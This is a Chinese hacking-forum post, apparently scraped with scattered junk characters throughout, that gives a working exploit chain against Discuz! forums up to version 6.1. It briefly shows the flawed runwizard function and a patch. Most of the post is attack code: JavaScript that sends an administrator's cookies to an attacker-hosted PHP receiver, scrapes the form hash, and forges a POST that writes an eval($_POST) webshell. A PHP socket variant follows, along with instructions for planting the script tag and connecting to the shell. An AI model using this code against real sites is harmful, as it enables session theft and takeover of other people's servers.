Discuz XSS得webshell
0 G( Y3 G" Y: e8 K3 i8 iBy racle @tian6.com1 U3 D7 N" E: S
欢迎转帖.但请保留版权信息.
a1 Q7 c: {2 a受影响版本 iscuz<=6.1.0,gbk+utf+big5
s( M% J" B# C) W4 U
( s3 Q9 H# y$ l j( d新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.
9 e4 Q& x/ G! q6 j3 j, b; f- ~- o+ C3 g0 b: R
, Q/ s$ t8 o9 b9 z" g
3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706 u; g% l7 o* `; ^1 Y h' D! A
当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.) x- _: o/ s/ p
7 ]4 P" F: V8 E+ G
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等.., s' D L" K# B
本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS
/ {9 F6 {9 u# a. i) q" u( j2 ?
; d- F6 Y# i) Y: A( y- ^0 {8 Z4 K C4 N9 w- n' R+ q, u
----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
! I2 G* B$ \. F; E6 E2 b0 z/ s. N1 w* \. d' h6 o, {9 t
& q# E. E1 N! }1 x# |
problem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.& ? _8 l: n4 F$ o# j1 \ T) m
4 e+ e3 L8 h+ v9 N# Cproblem2 ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.& X0 H) L) {8 e2 ~' `& d
6 t' {' M1 z' J) @: r% Mproblem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.+ B" [ V& N2 w+ n3 u
0 s* n- g! H0 L5 m v$ |5 _
. b5 [+ N/ G; h+ a T下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
" |: R/ [* h1 d5 a9 ]% c! C$ D9 i
3 f, T" w. A% u) \1 ? c global $runwizardfile, $runwizardhistory;" }5 y7 M: [3 ?1 ~7 d" X4 I7 W2 j
h0 B4 b4 i% U+ W
$fp = fopen($runwizardfile, 'w');
3 R" J( r7 Z, q+ S" |
* T% c p, X6 r* i! k fwrite($fp, serialize($runwizardhistory));9 m2 h3 x7 p! I' k( Q6 x. X
+ K% E& N3 f; q4 A fclose($fp);
9 Z5 D* [! `* M/ F9 [0 Z0 _8 d1 Q2 o
} e$ r5 @/ A: l" o" |9 h6 E! D
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.
+ ^* `' O% w0 }7 T; {以下是修补的办法:function saverunwizardhistory() {
: L# @! u4 Y" D! @: @; V
6 ?( J8 g7 ~( o. J1 ]) h/ B% F global $runwizardfile, $runwizardhistory;
m8 L$ n U) m' c: l4 u# M" s. l% N6 ^5 N2 A& y
$fp = fopen($runwizardfile, 'w'); m* I) i$ d( _' }" w
6 ]! Y2 B. P1 }6 y B. m
$s = '<?php exit;?>';6 |, W; f V8 p9 y+ n
) O8 L; ^/ Q- _" s) Y. |4 E/ f
$s .= serialize($runwizardhistory);0 `3 o! I/ Z: ^1 I; `. Z/ W: k5 T
0 G! x3 c6 d6 j3 D. [2 ], k" D5 |: H
fwrite($fp, $s);
. z t* e) n' l- U+ y0 D5 P G1 [
; |0 ^/ g F0 P1 \ fclose($fp);3 ~$ `5 S5 n q" U/ r% ^3 J6 o* ~
" l8 G+ @9 }& C0 _
}6 b! t8 _, p9 F% C V; w6 r7 U
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.& s; S) |: F! a7 o
( }7 t0 ^- n( s6 ]" u
+ t4 ]* z4 M9 X* }! o' [
6 M! @* |2 A1 Q% }' o1 I! P7 F
----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------4 M7 d1 L5 j) e6 f v4 K
5 Y/ y3 C' p) w% e7 o
2 M; n! O n4 t$ J" l
以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
) k& t) G% m; s+ @& a, y* u& ~# K$ `
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
. N; d' J3 {& j; \9 ?9 K
, l! h. [/ N* I9 Z9 Q- v这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.' R1 ?& v a0 z( q: I( P. X
+ N+ y/ s5 ?2 D, |9 f' z" w0 |! P
首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:+ r5 d+ X; {: O% c/ Y
% j% I$ M" P# h0 \
var url="http://目标网站/admincp.php"; # V( [7 l$ b& A" u* u. O7 [
+ R; a$ u1 R2 e. B' r# @
/*获得cookies*/
5 I' S# J0 x8 L# v% O
# M6 ?( z: J" ^& b+ Y kfunction getURL(s) {
$ A4 F. z. W U$ a. R# x8 t( y; |% t q
var image = new Image();9 z1 V, d& ^- }, U
4 \0 ~* S& g+ S \( f
image.style.width = 0;6 b8 v# g5 ~1 ^3 R' k0 j- X
! y b- s2 D& x& i9 U
image.style.height = 0;8 v7 n2 k) i# e: N5 Y! [8 L
2 ]5 T# n; _" e6 Z
image.src = s;# b) j3 c( e4 U" j! M6 w8 I. u* Z
) ~# B, |. M, I' ^% u; B
}9 F5 o* Y; o' C1 k* R
8 B7 N4 ~; Q/ f, ?( i4 J$ _8 }getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie)); //这里就通过image变量传给了php
6 K# Q7 I: N. i6 d) J, w复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
: f/ V2 ?- v i7 W复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) 
2 ]5 Z% \$ j* O8 W- y; R% A
* [& x4 f" A+ L) p6 V' ^- b$ ?4 {% v' w" h( l7 P4 y
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";) U/ i9 U: A" C9 d9 ` B
' Y/ h0 l7 H4 f
3 t- }& o# f; Y \" ~% C. N
# j2 B4 x0 \" U- d+ g/*hash*/
+ n, J0 K# X) L9 @; X( }& P! Z
# N6 m0 P# w1 ?6 `4 ]2 |4 zvar xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");
( F! f, `' i3 S% [0 c n# b: O) k, a2 ?
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);
* }9 @; ^) ]" ?" _
) Q. D$ R$ _: gxmlHttpReq.send();
y, Y z1 j( @1 }! e& j
) f: J Z# `3 l& B) x- i( f# bvar resource = xmlHttpReq.responseText;9 H2 d2 P! y2 `; F6 c0 |" z
$ }8 F( U h$ w8 {$ F/ t# f* J/ R1 Rvar numero = resource.search(/formhash/);1 W- ^5 [ d/ B, i! Q4 G
( N7 Q/ f9 F, o
var formhash=encodeURIComponent(resource.substr(numero+17,8));* P# u: Q a/ i8 N/ U- p! n
: g0 n# H5 {) H* c) E
. X; E: \7 n7 d1 p2 w% J; `4 V/ H3 l; j5 h* M4 }
var post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据 $ U- U* b( J- F" J3 O2 w: y
, J6 \' A6 Q# M( j4 I4 w% oxmlHttpReq.open(" OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信 / S7 s( o v4 Q% R
# f$ Z8 I* |& z8 o& QxmlHttpReq.setRequestHeader("Referer", url);
) E: O, |+ ~& Y% N4 s7 H+ E8 h
# H7 \0 j: F! n0 R4 AxmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
) h& V% t6 O( {
# i( f2 h7 P# e! \, F DxmlHttpReq.setrequestheader("content-length",post.length);
+ \, f4 v4 ]9 g3 Z7 c# C3 @2 T+ q3 w+ v% k( S% ?4 c- q8 t
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded"); 5 W: D6 e' b/ X; l+ A
% D' t" Y8 W4 i! _7 [ C; @xmlHttpReq.send(post);//发送数据$ n: S5 @6 p4 X8 G
复制代码这里HASH我假设正确,这样提交,也无须cookies
8 P8 c8 T3 [4 C2 u! W* K; Y9 B, G b# Q8 y- j
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
8 t b' m$ x6 p W. U
+ _, E2 p, }. I) \if (!$sock) die("$errstr ($errno)\n");. m5 e- S6 W! @% h( z/ c! Z. }( K/ I
& k0 d6 l# G6 a- ^8 P$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';+ a* a/ w! R$ q/ \( s
# J+ g% o7 v) A1 W3 H
* J5 ]* b6 D) q: A5 J% H% m& F! P9 Y& c C
fwrite($sock, " OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");) ^, c: ?, x. I% f' v M- q0 a6 ?# `& \
& ?6 r k0 M# N% H5 f# J. gfwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");) d8 \, b1 S. _6 h8 }% g
9 x" n$ H% A5 P% }
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");; w8 I9 X2 F) U0 B) K& f
) r7 P7 J2 g8 H
fwrite($sock, "Accept-Language: zh-cn\r\n");$ ]: v) X5 a: T+ e3 Q' l+ j# [+ n
2 u4 w$ e% ?. e' O' B9 Q# Lfwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");4 W1 @8 b% H+ g) v
6 _4 U$ _4 w* }: l& R
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");. r& n+ l; h" I$ {7 j' h, S
- M; F/ P. \& V
fwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");9 p1 [8 K3 y% H, V% v& A1 S2 d
" C; V- h% e4 G- g
fwrite($sock, "Host: $url\r\n");, \) @: d1 t! P1 y/ {, d1 g
! T; Q) b, Q( i+ v$ m4 `1 Dfwrite($sock, "Content-Length: ".strlen($data)."\r\n");5 A) ]0 ?- v! B8 q. J& R" _+ T6 R
- v: N5 D, T' h, v1 J+ S) Gfwrite($sock, "Connection: Keep-Alive\r\n");7 w* e% H& L3 b% q
8 p8 T1 Z( c2 S
fwrite($sock, "Cache-Control: no-cache\r\n");
. @+ q: b- D* w- h j k R% y4 s2 W6 w1 H$ p' }7 h
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");& Z2 g& o& V6 w# w5 k
( b1 m! M1 ]/ i# O' U
fwrite($sock, $data);) }. D4 V& Q! k) {$ k, a
! o7 u; d' B( g
) o6 \ ?0 q2 o; m9 y3 Y4 p- G8 Q' C( Y) _. w; m7 Y( W" c
$headers = "";( \2 {0 H/ Y$ t9 W- [+ t
$ F5 [3 G" F6 N U" L- Gwhile ($str = trim(fgets($sock, 4096)))
9 `4 S' T1 e3 c% U2 A1 a8 V* }1 h5 E( D# \9 v$ l9 n
$headers .= "$str\n"; g1 ] p6 Y' O5 [
; o' c1 o& e* p; l$ J# E2 L
echo "\n";
3 V1 Q# T$ K1 a
- r, _% Y% h$ }2 R! p$body = "";
3 {6 }7 g% ^- _$ ^/ p
5 w% ~7 M$ h( L" l5 Fwhile (!feof($sock))
" f& P- o% ?# k8 v: L4 x$ Q4 N$ ^( B2 r5 N+ p) `
$body .= fgets($sock, 4096);8 K' V8 _' D5 ?: o5 r7 P
3 n: J4 \$ f! q" C: B
fclose($sock);
1 ?0 T8 }7 |' q* |2 v4 s8 J
! |) ?8 _9 s& h8 B: Recho $body;
, J# Z5 ^9 h5 D, P/ }复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
) n) I7 g7 _6 j
% @% z9 e# y( h2 Y8 C- k3 A; b0 q8 |0 X; b: t: @
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------5 P. ]3 z. j4 O* A
7 e8 a; N8 O# @/ }9 t( @' h% O
' ?6 A5 o. o4 j- M4 n1 HP SOCKET利用方法首先打开racle.js
6 i( M+ ^* O! @2 y# C% [3 M+ C
- _- o. t( m% }+ B6 @; a* Yvar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home, l4 I% _6 e4 B O% a
' @" `. H. ~" h0 k5 O# G! E' r
7 b6 J; r6 N$ W/ h3 W7 t4 u# _) H# U5 Z- S* u( O1 [0 Q4 J
然后打开racle@tian6.php5 s3 }% R: D: ?7 L
: T8 W. k$ g2 U: K* `
$url="racle@tian6.com"; //改成你要XSS攻击的目标,譬如www.discuz.com
# Q* F% r* K3 T+ o2 g. ?
1 J) c# w0 d; |: u m8 @9 }4 b; x
6 E1 ]& a4 ^- y/ [" j, ?' v: r如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
$ v' u, _/ R' S2 _- b* h) l
. b& f, R, o' M6 Q: }getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));% r! E/ y% S, ~. V; N
/ B# j5 @' q3 ~# }8 g为
o+ r, q/ P0 @$ Z, _( ]
! r: o% R# m* y% y$ L6 r: ~getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
+ Q' d$ X5 L4 d5 r" t2 m复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
! e2 l: L: p! {, M3 J( Y, D- h; Y) z0 B4 }* E
2 I) J; ^8 o" P1 p
0 T5 S$ _5 u2 z8 Y; ]3 _
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
d& V' }, J h' a9 f9 T* q
2 }5 n9 N( X4 x: Lvar formhash=encodeURIComponent(resource.substr(numero+17,8)); t" @0 @4 ~5 s. l# C; {; |* b
: {- Y& J' ]2 d4 \
为
B. ^4 ]5 n+ G; \# ^
+ Z& ]. R+ D5 x6 O2 o3 W7 Zvar formhash=encodeURIComponent(resource.substr(numero+9,8));
* n% Z( O1 d9 W ]5 f( o复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧., X: B3 L( ]/ g$ o6 o
. y* s; M+ p0 p+ z. g# c1 d
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.* U1 m# v4 L& l9 ]: C+ G
1 X/ Y0 X+ F6 o- l4 g' p( S( j如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.
9 w m. _) ^) m8 X0 B
L; w: z0 d6 |5 C不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.: E% s* T! i2 |+ \! Z: v0 l
% i6 T0 d9 G4 P9 q |